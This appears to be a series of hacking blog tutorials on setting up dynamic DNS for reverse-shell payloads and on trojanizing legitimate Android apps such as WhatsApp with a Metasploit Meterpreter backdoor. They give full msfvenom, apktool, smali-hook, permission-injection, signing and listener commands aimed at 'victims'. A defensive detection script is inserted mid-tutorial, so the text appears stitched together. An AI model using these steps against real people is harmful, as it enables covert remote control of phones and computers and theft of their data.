A public IP is the IP that’s visible to machines outside your local network. For example, if two or more machines are connected through a router (maybe over WiFi) to the internet, then the machines form a local network and are also connected to the Internet. Each of them has a private IP address that is unique only locally, not globally. For connecting to the Internet they use the router’s public IP.

IP addresses can be static or dynamic. Most ISPs provide a dynamic public IP, which means it changes from time to time, contrary to a static one, which remains fixed. You can check your public IP by googling ‘What is my IP’; Google will tell you.

Having a dynamic IP address is a hindrance to hacking using reverse connection payloads. Reverse connection payloads, such as android/meterpreter/reverse_tcp, store the host IP address, i.e. the IP address of the attacker’s machine. When the payload is executed, it connects back to the host machine using that stored IP. But as a dynamic IP keeps changing from time to time, you won’t be able to use a payload for long, because after some time the IP stored inside it won’t point to your machine anymore. That’s a problem. A major one. This is where DDNS comes in.

Dynamic DNS aka DDNS to the Rescue

We all know what DNS, or the Domain Name System, is: it’s the system that binds an IP to a domain name. When you try to connect to a domain name, for example by opening www.google.com in a browser, the request first goes to a DNS server, which resolves the domain name into an IP, and then the browser gets the Google homepage from that IP. Similarly, you can get a domain name for your machine and put that domain name in place of the host IP address in your payload. But the problem of your IP being dynamic still remains.

Here DDNS comes to the rescue. A DDNS service updates the DNS record for your machine continuously, so that even for a machine with a dynamic IP the domain name always resolves to the correct IP.

Setting up DDNS using No-IP

There are many DDNS providers; I’m going to use No-IP, which is one of them.

Step 1: Creating a No-IP account

Head to https://www.noip.com and create a free account there.

Step 2: Adding a Hostname in No-IP

When you get to the dashboard, go to Dynamic DNS -> Hostnames and add a hostname of your choice there. You can also choose a domain name from a list. The address you get is hostname.domainname. For example, I chose the default domain name ddns.com and entered the hostname skulltech, so the address I got is ‘skulltech.ddns.com’. Refer to the screenshots below.

[Screenshot: step-1] [Screenshot: step-2]

Step 3: Install the Dynamic DNS Update Client

Now you’ll need to install a program on your computer and set it up so that it connects to the No-IP server frequently and updates the DNS record. Download the update client from https://www.noip.com/download . It’s a tar.gz archive; extract it using the following command

tar -xzvf noip-duc-linux.tar.gz

[Screenshot: screenshot-from-2016-12-18-14-24-36]

After that, change the working directory to the newly extracted folder and run the following command to install the No-IP client.

make install

[Screenshot: screenshot-from-2016-12-18-14-38-06]
After that the program will ask for your No-IP username and password.

Step 4: Configure the Client and Run It

Run the following command to launch the configuration wizard of the No-IP client. It will ask for your credentials, as well as which hostnames you want to update. In that step, select the hostname (or hostnames) that you want to associate with this computer.

noip2 -C

When you are done with the configuration, just run noip2 in the terminal to start the client; it will run in the background and keep updating your DNS record.

noip2

[Screenshot: screenshot-from-2016-12-18-14-49-56]

Using DDNS hostname in Payloads

You can create a basic reverse shell payload for Windows and get a shell on a remote computer by running it on that computer. Refer to this tutorial by Offensive Security for that; I won’t go into the details of how to do it. Assuming that you already know how to create these payloads using msfvenom (if you don’t, check out this tutorial), I’ll show you how to use your DDNS hostname there.

Generally we run a command like this to generate the payload. Here LHOST is the address of our local machine; in the following example it’s 192.168.1.101.

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Now that we have a DDNS hostname, pass it as LHOST to msfvenom instead of your IP. So now the command will be

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=skulltech.ddns.com LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Feel free to leave a comment if you face any problem. Happy Hacking! 🙂

Embed a Metasploit Payload in an original .apk File | Part 2 – Do it manually

Metasploit’s flagship product, the Meterpreter, is a very powerful, all-purpose payload. Once it is installed on the victim machine, we can do whatever we want with their system by sending commands to it. For example, we could grab sensitive data out of the compromised system.

The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones too. But if you have tried out these payloads you know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app on their phone?

One solution is to embed the payload inside another, legitimate app. The app will look and behave exactly like the original one, so the victim won’t even know that his system is compromised. That’s what we are going to do in this tutorial.

NOTE – This is a follow-up to my previous post, in which I showed you how to do this using a very simple yet effective Ruby script. If you haven’t read it, check it out. If you are not willing to go down the hard path, you can use that method just fine. But if you want to know the inner workings and gain a deeper understanding, continue reading this post. Also, in the following Android hacking tutorials I may refer back to this one, so if you can take it, I suggest you keep on reading.

PRE-REQUISITES:

This tutorial is based on the Kali Linux operating system. I’m sure it can be done on other OSes, especially Linux distros, but that will involve some more complications, so I’m not going to cover those. If you are serious about Hacking [or Penetration Testing, if you prefer], you should use Kali, as it was built specifically for pen-testing.

We will also need some libraries and tools in the following steps, so I think it’s better if you install them right now.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

Also download the apk which you want to be backdoor-ed from any source you like. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in the root folder.

BRIEF OVERVIEW:

Since this tutorial is a little bit long, I’m giving a brief overview of what we are going to do here.

  1. Generate the Meterpreter payload
  2. Decompile the payload and the original apk
  3. Copy the payload files to the original apk
  4. Inject the hook into the appropriate activity of the original apk
  5. Inject the permissions in the AndroidManifest.xml file
  6. Re-compile the original apk
  7. Sign the apk using Jarsigner

That’s about it. I will also show you how you can get a working Meterpreter session using that backdoored apk, if you don’t know that already. So let’s get started.

STEP 1: GENERATE THE PAYLOAD:

First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is –

msfvenom -p android/meterpreter/[Payload_Type] LHOST=[IP_Address] LPORT=[Incoming_Port] -o meterpreter.apk
      • Replace [Payload_Type] by any of the following available payloads. The function of all these payloads is the same, essentially they are all Meterpreter payloads; the difference is only in the method they use to connect to your Kali system. The available [Payload_Type]s are –
        1. reverse_tcp
        2. reverse_http
        3. reverse_https

        You can use any one you like, I’m going to use reverse_https as an example.

      • Replace [IP_Address] by the IP address to which the payload is going to connect back, i.e. the IP address of the attacker’s system. If you are going to perform this attack over a local network (e.g. if the victim and attacker are connected to the same WiFi hotspot), your local IP will suffice. To know what your local IP is, run the command –
        ifconfig
        Screenshot from 2015-12-18 13:56:49

        If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google “My IP” and Google will help you out.

      • Replace [Incoming_Port] with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I’m going to use 4895 as an example.

So run the command, replacing the keywords with appropriate values, and MSFVenom will generate a payload “meterpreter.apk” in the root directory. Note that we specified the output file name using the “-o meterpreter.apk” argument in the command, so if you like, you can name it anything else.

Screenshot from 2015-12-18 14:23:14

STEP 2: DECOMPILE THE APKs:

Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original /root/[Original_APK_Name]

It will decompile the payload to the “/root/payload” directory and the original apk to the “/root/original” directory.

Screenshot from 2015-12-19 01:30:26


STEP 3: COPY THE PAYLOAD FILES:

Now we have to copy the payload files to the original app’s folder. Just go to “/root/payload/smali/com/metasploit/stage” and copy all the .smali files whose file name contains the word ‘payload’. Now paste them in “/root/original/smali/com/metasploit/stage”. Note that this folder does not exist, so you have to create it.

STEP 4: INJECT THE HOOK IN THE ORIGINAL .SMALI CODE:

In the previous step, we just copied the payload code inside the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn’t necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook into the original apk’s .smali code. If you are wondering what this hook thingy I’m talking about is, well essentially it’s code that intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.

For this, firstly we have to find out which activity [to put it simply, activities are sections of code, it’s similar to frames in windows programming] is run when the app is launched. We can get this info from the AndroidManifest.xml file.

So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially markup languages, and both use the familiar tags-and-attributes structure [e.g. <tag attribute="value"> Content </tag>]. Anyway, look for an <activity> tag which contains both of these lines –

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value. In my case, as you can see from the screenshot below, it is “com.piriform.ccleaner.ui.activity.MainActivity”.

Screenshot from 2015-12-19 13:21:32

Those two lines we searched for signify that this is the activity which is going to start when we launch the app from the launcher icon, and also that this is a MAIN activity [similar to the ‘main’ function in traditional programming].

Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –

gedit /root/original/smali/[Activity_Path]

Replace [Activity_Path] with the activity’s “android:name”, but with slashes instead of the dots, and add the .smali extension. The smali code is stored in a folder hierarchy that mirrors the dotted “android:name”, so we can easily get the location of the .smali file this way. Check the screenshot below and you will get an idea of what I’m trying to say.

Screenshot from 2015-12-19 19:06:17

Now search for the following line in the smali code [using CTRL+F] –

;->onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is inserting code that starts the payload alongside the existing code which is executed when the activity starts. Now, save the edited smali file.

STEP 5: INJECT THE NECESSARY PERMISSIONS:

From developer.android.com –

Additional finer-grained security features are provided through a “permission” mechanism that enforces restrictions on the specific operations that a particular process can perform.

If we do not mention all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most of the users don’t care to read all those boring texts, so we do not have to worry about that much.

These permissions are also listed in the previously encountered AndroidManifest file. So let’s open the AndroidManifest.xml of both the original app and the payload from their respective folders. The permissions are declared in <uses-permission> tags, as the ‘android:name’ attribute. Copy the additional permission lines from the payload’s AndroidManifest to the original app’s one, but be careful not to create any duplicates.

Here’s my original app’s AndroidManifest before editing –

Screenshot from 2015-12-19 19:37:12

After adding the additional ones from the Payload’s AndroidManifest, my /root/original/AndroidManifest.xml looks like this –

Screenshot from 2015-12-19 19:42:48
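The three artefacts that steps 4 and 5 leave behind (a hooked launcher activity, an extra invoke-static line in its onCreate, and permissions the original build never requested) are exactly what a reviewer looks for when triaging a repackaged app. The following Python script is an added, defender-side example, not code from the original post: it reads apktool output and reports the MAIN/LAUNCHER activity, the permissions a suspect build adds over a known-good build, and any invoke-static call into the com.metasploit.stage package. The manifests and the smali excerpt are constructed samples embedded inline.

```python
import xml.etree.ElementTree as ET
A = "{http://schemas.android.com/apk/res/android}"  # the android: XML namespace

# Constructed manifests (not from the post): a known-good build, and a repackaged
# copy with extra <uses-permission> lines copied in from a payload manifest.
ORIGINAL = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
  package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name="com.example.app.ui.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""
SUSPECT = ORIGINAL.replace(
    '<uses-permission android:name="android.permission.INTERNET"/>',
    '<uses-permission android:name="android.permission.INTERNET"/>\n'
    '  <uses-permission android:name="android.permission.RECORD_AUDIO"/>\n'
    '  <uses-permission android:name="android.permission.READ_SMS"/>')

# Constructed smali excerpt of a hooked onCreate; the invoke-static line is the
# one-line signature a repackaged Meterpreter app leaves in the launcher activity.
SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    .locals 0
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    return-void
.end method"""

def launcher_activities(manifest_xml):
    """Activities with a MAIN action and LAUNCHER category: the first classes to inspect."""
    names = []
    for act in ET.fromstring(manifest_xml).iter("activity"):
        for filt in act.findall("intent-filter"):
            actions = {a.get(A + "name") for a in filt.findall("action")}
            cats = {c.get(A + "name") for c in filt.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in cats):
                names.append(act.get(A + "name"))
    return names

def permissions(manifest_xml):
    return {p.get(A + "name") for p in ET.fromstring(manifest_xml).iter("uses-permission")}

def added_permissions(original_xml, suspect_xml):
    """Permissions the suspect build requests that the known-good build does not."""
    return sorted(permissions(suspect_xml) - permissions(original_xml))

def payload_hooks(smali_text, markers=("Lcom/metasploit/stage/",)):
    """invoke-static lines that call into a known payload package."""
    return [ln.strip() for ln in smali_text.splitlines()
            if ln.strip().startswith("invoke-static") and any(m in ln for m in markers)]
```

On a real decompiled tree, feed it the two AndroidManifest.xml files and the .smali file of each reported launcher activity; an app that gains RECORD_AUDIO or READ_SMS between two builds of the same package deserves a closer look even when no known marker matches.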

STEP 6: RECOMPILE THE ORIGINAL APK:

Now the hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –

apktool b /root/original

Screenshot from 2015-12-19 20:14:31

You will now have the compiled apk inside the “/root/original/dist” directory. But we’re not done yet.

STEP 7: SIGN THE APK:

This is also a very important step, as in most cases an unsigned apk cannot be installed. From developer.android.com –

Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA [apk_path] androiddebugkey

Be sure to replace the [apk_path] in the above command with the path to your backdoored apk file.

Screenshot from 2015-12-19 20:28:31

PROFIT?!:

Now if you can get the victim to install and run this very legit-looking app on his phone, you can get a working Meterpreter session on his phone!

Screenshot from 2015-12-19 20:44:01

Embed a Metasploit Payload in an Original .apk File | Part 1 – The Easy Way

Hi Fellas! I’m sure most of you, or at least those who have set foot in the kingdom of hacking, have heard of Metasploit. Don’t be disappointed if you haven’t, because you’re on the right track.

From Wikipedia,

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

In more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is, it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload on the victim’s phone by any means [usually involving Social Engineering], and when the victim runs the application, we get a direct connection to that phone remotely and can use it to wreak havoc on it.

But since the payload app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.

Here’s where this tutorial comes in. I’m gonna show you how to take any .apk file, be it WhatsApp or Amazon or SnapChat, and embed the Meterpreter payload in that apk. To the victim it will look and behave exactly as the original app, so he will use it regularly without any doubt, letting you do anything you want to his phone.

PRE-REQUISITES:

Just to be clear, in this tutorial the operating system used is Kali Linux, which is the de facto standard OS for Penetration Testing (read: hacking). You should also install the latest version of ‘ApkTool’ and some libraries for the scripts to work properly.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

STEP 1:

First of all grab the original apk from any of the numerous websites available. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in any folder; in this tutorial I will use the root folder and a WhatsApp.apk as example.

STEP 2:

Download the Ruby script from this link and save it in the same folder as that of the original apk.

STEP 3:

Open a terminal, and type the following command:

ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

In this example I’ve used 192.168.0.104 as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.

NOTE – If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option. You also may need to forward the port you’re using for this attack to work properly.

Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more often than not it cannot determine which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal open with the script at the prompt, and browse to /root/original.

Then open the AndroidManifest.xml file using any text editor you like and look for an <activity> tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and from there, note the name of that Activity.

At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.

This is the hardest step of all, so I’m posting some screenshots to make your life easier.

Screenshot from 2015-12-12 01-44-01

Screenshot from 2015-12-12 01-43-27

PROFIT?!:

If you did everything correctly, you should now have an apk file in your root directory with the name ‘backdoored_WhatsApp.apk’. It will install and run just like the original app.

As for the listener, you should use multi/handler and set the corresponding options accordingly. Just run the following commands.

msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

Now wait for the victim to run the app; when he does, you will get a Meterpreter prompt in the terminal!

Screenshot from 2015-12-18 14:32:55

NOTE:

You must have noticed I haven’t explained anything, rather asked you to blindly follow. As none of us wants to be a script-kiddie, we will learn how to do this manually in the next article. To be honest, I didn’t know how to successfully implement this until I found this script. After I saw that this script does what it promises, I learned the process by reverse-engineering it. Let us leave that story for another article.

If you face any problem, don’t forget to mention it in the comments. I’ll try to help you in any way I can.

CREDITS:

I found the script from the comments section of a thread in NullByte, so thanks to the guy who shared it, I’m sorry I don’t remember which thread it was or who the guy was. And credit of making this script goes to timwr and Jack64.